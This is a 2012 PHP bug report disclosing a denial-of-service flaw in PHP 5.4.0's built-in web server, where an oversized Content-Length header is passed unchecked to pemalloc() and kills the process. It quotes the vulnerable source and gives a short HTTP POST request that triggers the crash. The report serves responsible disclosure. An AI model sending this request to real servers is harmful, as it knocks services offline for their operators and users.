[2012-03-21 00:53 UTC] contact at kaankivilcim dot com

Description:
------------
A denial of service condition can be triggered by HTTP requests that are sent to the built-in PHP web server with a large Content-Length header value.

The value of the Content-Length header is passed directly to a pemalloc() call in sapi/cli/php_cli_server.c on line 1538. The inline function defined within Zend/zend_alloc.h for malloc() will fail, and will terminate the process with the error message "Out of memory".

1534 	static int php_cli_server_client_read_request_on_body(php_http_parser *parser, const char *at, size_t length)
1535 	{
1536 	php_cli_server_client *client = parser->data;
1537 	if (!client->request.content) {
1538 	client->request.content = pemalloc(parser->content_length, 1);
1539 	client->request.content_len = 0;
1540 	}
1541 	memmove(client->request.content + client->request.content_len, at, length);
1542 	client->request.content_len += length;
1543 	return 0;
1544 	}

Setting a value (e.g. 2^31 - 10) for the Content-Length header close to the upper limit of an int for the platform (e.g. 32-bit) in use will trigger the condition.

Test script:
---------------
An example HTTP request that will trigger the bug is shown below.

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 2147483648

A=B

Expected result:
----------------
The expected output would be a meaningful error message.

Invalid request (Requested Content-Length is larger the allowed limit of XYZ)

Actual result:
--------------
The output observed for the PHP process is shown below.

PHP 5.4.0 Development Server started at Tue Mar 20 19:41:45 2012
Listening on 127.0.0.1:80
Document root is /tmp
Press Ctrl-C to quit.
Out of memory